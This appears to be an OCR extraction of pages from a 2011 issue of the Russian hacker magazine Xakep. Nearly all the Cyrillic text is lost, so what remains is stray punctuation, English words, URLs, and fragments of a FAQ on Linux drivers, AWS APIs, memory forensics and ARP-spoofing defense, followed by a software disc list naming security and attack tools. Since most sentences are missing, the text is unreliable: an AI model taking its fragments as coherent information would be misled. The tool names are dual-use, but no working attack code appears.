, ,
.
? ?
,
X-Files.
, XXI , , ,
. -
. , , ,
. ,
,
. , ,
136
.
,
, -, .
,
, . ( , )
, , ,
. ( , )
(?!).
, - ,
?, - .
, - ,
, , . ,
, .
. , ,
, , ?
, , ,
, , , . ,
- , ,
,
.
,
X 04 /147/ 2011
!
- . ,
,
. !
:
,
, . , ( ).
,
. , , , . , ,
,
. , , ,
, .
,
, , . , , ,
,
X 04 /147/ 2011
.
, , ,
, - , . ,
? ,
, ,
, ,
, .
.
, , ?
, , , ,
.
, - (
), - ( , ,
, , ).
,
,
137
UNITS
.
, .
>
, , ,
,
. poltern
, Geist . (
)
.
, , .
: , ( ,
, ) , ,
, ,
- .
, ,
. ,
- .
, , , , .
( )
-
(
) (
).
(, ,
, ) , . ,
( , ) , , ,
. - ,
, - , -,
,
(
, ?).
, ,
- , (,
).
: - - , -
- .
,
-, .
> ()
, - . ,
-
: , ,
,
, .
, , . ,
.
138
,
, ,
. , ,
,
. ,
.
:
240
( ),
, (
).
, ,
. -
, - . , - - , ][
:) : http://bit.
ly/telekinez.
>
, ,
, -
, - ,
. ,
, ,
. - , 1927
. Michigan Medical , ,
, ,
,
. - : ( ,
, ), ,
.
, , ,
, , . ,
, - ,
: () ,
, . ,
, . : - .
, , , , - .
, , ,
. - ,
,
. , ,
, . , ,
. ,
X 04 /147/ 2011
, : ,
,
. , ,
, -
.
>
(extra , sensus ).
: ( ), ( , ,
), (
). .
,
, , , .
,
. ( - !), , : - , - , - . ,
( , - , ),
(
) ,
, , ,
. , , X 04 /147/ 2011
(
)
,
. . , -, ,
, ,
, (
?) .
, ,
- ( , !) , , -, , , ! ? , , ?
- ,
, . , ! ?
. ,
, , , , , ,
!.
- , . ,
.
P.S.
,
-, - , . z
139
UNITS
Step (twitter.com/stepah), Ant
faq
united?
faq@real.xakep.ru
Q: ,
PHP.
.
. ,
,
.
.
?
A: ,
, . ,
, ++.
,
PHP.
. ,
Facebook
HipHop for PHP (github.com/
facebook/hiphop-php), PHP C++
g++ .
PHP, HipHop
.
( PHP ),
,
140
PHP
5.2 ( 5.3)
Linux.
Q:
, Amazon
Web Services ,
.
.
,
Amazon -
API,
,
?
A: , API
Amazon . , .
S3,
, REST API. EC2,
, Query API
EC2. ,
,
API.
,
. ,
API
Amazon.
Boto
(code.google.com/p/boto).
2.0beta4,
AWS (Amazon Web Services),
DNS- Route53
Amazon
Simple Email Service. ,
,
X 04 /147/ 2011
:
ndiswrapper -i driver.inf
, :
ndiswrapper l
,
wlan0, iwconfig/wpa_supplicant
. .
ARP-
ARPFreezerNG
,
. boto.cloudhackers.
com
.
Q:
(Windows Event Log) ?
A:
,
Memoryze
(mandiant.com/products/free_software/
memoryze) Volatility (volatilesystems.com/
default/volatility).
. Memoryze
:
1. Auditviewer
. , .
Process
Enumeration Memory sections.
2. ,
services.exe,
Memory Sections.
, .
3.
services.exe Acquire Process. ,
,
__SystemMemory%5c0x###
#####-########.VAD.
Windows, .
4.
Event Log Explorer (eventlogxp.com) Perl- evtViewer (sourceforge.
net/projects/evtviewer).
.evt.
X 04 /147/ 2011
Q: Linux. ,
.
: Linux
. , -
?
A: , -
, -
,
.
: Windows!
-, ,
. ?
Ndiswrapper (ndiswrapper.
sourceforge.net). ,
API- Windows (
) API NDIS (Network
Driver Interface Specification) Linux.
,
Linux ,
, - . Ndiswrapper
, PCMCIA USB
.
, lspci nn (
PCI-) lsusb ( USB-),
, .
, .
,
32- Windows XP. , .zip, .cab .exe,
( *.inf, *.sys, *.bin).
Q: ,
MacBook (, ,
) .
Linux?
A: ,
Linux 2.6.30
multitouch. , , ,
.
TouchEgg (code.google.com/p/touchegg),
.
, uTouch evdev.
- ,
/usr/share/touchegg.conf.
: , , .
, ,
.
touchegg.conf :
#FOUR FINGERS DRAG
[FOUR_FINGERS_DRAG_UP]
action=CHANGE_DESKTOP
settings=DIRECTION=LEFT
. .
Q: (Windows 7)?
A: , -
.
, ,
,
Autologon (technet.microsoft.com/en-us/
sysinternals/bb963905) -
141
UNITS
.
- .
A: , ,
VirtualKd
. GUI-
, ,
.
,
:
autologon.exe user domain password.
Q:
, : WinDBG
!
?
A: -
COM-,
.
115200
( 10 /),
, . ?
, COM-
.
VirtualKd (virtualkd.sysprogs.org),
Windows
VMware VirtualBox.
WinDBG/KD
COM- (named pipe):
450 /
VirtualBox 150 / VMWare.
Windows ,
(WinDBG/
KD),
.
,
snapshot,
.
:
.
142
GUI-.
. , VirtualKd Windbg debugger
IDA Pro : hexblog.com/?p=123.
Q: ARP
Poison ?
A: ARP Poison -
( ).
,
ARP-spoofing (xakep.ru/
magazine/xa/068/060/2.asp).
.
.
IDS Snort,
DecaffeinatID (irongeek.com/
downloads/decaffeinatid0.08.zip),
ARP-. , ,
MAC- ,
.
Windows .
,
ARPFreeze (irongeek.com/downloads/
arpfreezeng.zip),
GUI-
ARP-,
Cain & Abel,
Ettercap, Arpspoof ,
MITM-.
( arp netsh),
ARPFreeze ARP- .
Q:
,
,
, , .
. -
, Peach (peachfuzzer.
com). ,
,
:
XML-.
,
. ,
, ,
GUI-,
.
. ,
, Peach.
(, Python)
(Scapy, secdev.org/
projects/scapy),
.
? ,
, ,
(xakep.ru/
magazine/xa/126/028/1.asp).
Q:
ATA,
! ,
. ?
A: , - -
, .
. ,
.
HDD.
MHDD (ihdd.ru/
mhdd), .
BIOS,
,
SATA- PATA-
. ,
HEX-
,
-. ( )
:
bit.ly/pass_hdd_retrive. z
X 04 /147/ 2011
>Multimedia
AmoK Exif Sorter 2.56
Chasys Draw IES
Divine Free Edition 0.5.0
InstantMask 1.4
ISO Workshop 1.0
Juice 2.2
MusicBrainz Picard 0.13
PhotoDoc 1.0.5
SMRecorder 1.2
>Misc
Akira 1.0
App Hide for Windows
AutoHotkey 1.0.48.05
AutoIt 3.3.6.1
BoxCryptor 0.1.0alpha
Cache My Work 1.2
Ceedo Personal
Client for Google Translate
Growl for Windows 2.0.6
Horodruin 3.0.260.0
Jump List Software for Windows 7
KeyCounter
MacSwitch 1.1.1
MojoPac 2.0 Free
Nemo Documents
NoDrives Manager 1.2.0
RED 2.2
RidNacs 2.0.3
StrokeIt .9.7
Synergy 1.4.2 beta
TaskUnifier 0.7.4
VirtuaWin 4.3
>Games
Soldat 1.5
Ruby:
Aptana RadRails 2.0.5
Arcadia 0.9.3
IronRuby 1.1.1
JRuby 1.6.0.RC2
Ruby 1.9.2
RubyGems 1.6.1
SlickEdit
TurboRuby 1.2
>>WINDOWS
>Development
Access To MySQL 3.0.0
Codex
Crack.NET 1.2
DreamCoder for MySQL Freeware 5.3
DreamCoder for Oracle Freeware 5.1
DreamCoder for PostgreSQL
Freeware 2.5
Extreme Editor
Geany 2.0
Mono 2.10
Scapy
SharpDevelop 4.0
SmartAssembly 6.0
TortoiseHG 2.0
WebStorm 2.0
>>UNIX
>Desktop
Ardour 2.8.11
Decibel 1.06
emelFM2 0.7.5
Exaile 0.3.2.1
File Roller 2.24.3
Fluxbox 1.3
Gmusicbrowser 1.0.2
>Net
3CX Phone System 9.0
Comodo EasyVPN
Deluge 1.3.1
Nemesis 1.4
Orbit downloader 4.0.0.7
Probe Web Server 1.0
SRWare Iron 9.0.6
TeamViewer 6.0
Torrent2exe
WinSCP 4.3.2
XAMPP 1.7.4
>Security
Attack Surface Analyzer BETA
BinScope Binary Analyzer
Cuckoo 0.1.0 beta
El Jefe 1.1
knock 1.4.4b
malpdfobj
Maltego 3.0.3
Mobius Forensic Toolkit 0.5.6.1
nmap 5.51
ostinato 0.3
PRAEDA
Process Hacker 2.11
R-U-Dead-Yet 2.0
safeseh-dump
WebScarab NG 0.2.1
Wireshark 1.5.0
>System
AppRemover 2.2.11.1
Boot-US 2.1.8
BufferZone Pro
Buster Sandbox Analyzer 1.26
Crucial System Scanner
CrystalDiskInfo 4 Dev5
Dokan SSHFS 0.6.0
Driver Magician Lite 3.5
Process Tamer 2.11.01
SlimDrivers 2.0.4
TeraCopy 2.1
Unknown Device Identifier 7.00
VirusTotal Uploader
SPlayer 3.6
Sublight 2.6.3
Verbum alpha
VirtualDub 1.9.11
Webcam Simulator 5.3
Webinaria
WinX DVD Author
WizMouse 1.6.0.0
. 1.1
>Security
Adsuck 2.1
Aidsql
Angry IP Scanner 3.0
Arachni 0.2.2.1
ASSP 1.8.5.5
DirBuster 0.12
getTorExitNode
HTTPForge 11.02.01
JBoss Autopwn
>Net
Balsa 2.4.9
Blam 1.8.7
ClipGrab 3.1.0.1
Dillo 2.2
Google Chrome 9.0.597.98
gPodder 2.13
JMule 0.5.8
Mozilla Firefox 3.6.13
Mumble 1.2.3
NetHogs 0.7.0
Opera 11.01
Rss-Aware 2.03
Steadyflow 0.1.5
Sylpheed 3.1.0
Turpial 1.3.4
TorrentVolve 1.4
TweetDeck
Yarssr 0.2.2
>Games
Trigger Rally 0.5.2.1
>Devel
Anjuta IDE 2.30.1.0
Boost 1.46.0
GTK+ 3.0
Jdk 6 update 24
Libmcrypt 2.5.7
Mono 2.10
Musl 0.5.0
Nasm 2.09.05
Pudb 0.93.1
Python 3.2
Racket 5.1
SciTE 2.24
Tora 2.1.3
UMLet 11.0
Wing IDE 4.0
wxPython 2.9.1.1
XAMPP 1.7.4
Zimbra 7.0
GnomeBaker 0.6.4
keyTouch 2.4.1
Kino 1.3.4
Leafpad 0.8.18.1
Macbuntu 10.10
Mirage 0.9.5.2
Mixxx 1.9.0
QtiPlot 0.9.8.4
Tellico 2.3.2
Terminator 0.95
Wink 1.5
>>MAC
1Password 3.5.7
Ambientweet 1.0
ArtRage 2.6
atMonitor 2.1.5
Billings Pro 1.0.1
Boom 1.0
Burn 2.5.1
Camouflage 1.25
Cornerstone 2.0
IceClean 3.46
MacTubes 3.0.3
Permute 1.0
Right Zoom 1.7
Speed Download 5.2.22
Ted 0.9715
Trillian 1.1.0.1
TupeIt4Me 4.2.1
Ukelele 2.1.4
UnPlugged 1.8
Watts 4.14.1
>System
Bash 4.2
Burg
Coreutils 8.10
Fedoraplus 1.0
gctWiMAX 0.0.1d
GKrellM 2.3.5
Linux Kernel 2.6.37.2
MountManager 0.2.6
Ndiswrapper 1.56
Network UPS Tools 2.6.0
nVidia 260.19.36
Touchegg 0.1
Wine 1.3.14
Winetricks
xf86-video-ati 6.14.0
XSane 0.998
>X-Distr
SANS SIFT Workstation 2.0
FreeBSD 8.2
Mallory
Mcrypt 2.6.8
Mpctp 1.7
Rootkit Hunter 1.3.8
SambaScan2 0.5.0
Samhain 2.8.2
Scapy 2.2.0
XSSer 1.5
yInjector
knock 1.4.4b
malpdfobj
Maltego 3.0.3
Marvin v0.9
Mausezahn 0.40
Mobius Forensic Toolkit 0.5.6.1
Netbios Shares Scanner 0.3
Nmap 5.51
ostinato 0.3
PRAEDA
WebScarab NG 0.2.1
Wireshark 1.5.0
04(147) 2011
: 2
10
.
. 64
. 60
CISCO
BLACK HAT
AMAZON KINDLE
FACEBOOK
TJAT.COM
-
GEOHOT VS SONY
GO
. 110
NATIVE API
04 (147) 2011
DNS-: . 54
UNITS
HTTP://WWW2
VPN-
ANONYMOUSCOAT
anonymous.co.at
QUICKDIFF
quickdiff.com
, - VPN-,
IP-
. ,
, ,
. OpenVPN,
, .
( ). ,
512 /c,
80- 443-. :
.
.
, .
, ,
,
. ,
, Quickdiff. .
: , ,
( ),
.
OCR
ONLINE
ocronline.com
AVIARY
aviary.com
,
ABBYY FineReader. . -,
, -,
. -
OCR Online. , .
! , , :
,
.
. - AudioExprert.
, , .
, ,
. -, AudioExprert ,
,
, . , ,
.
144
X 04 /147/ 2011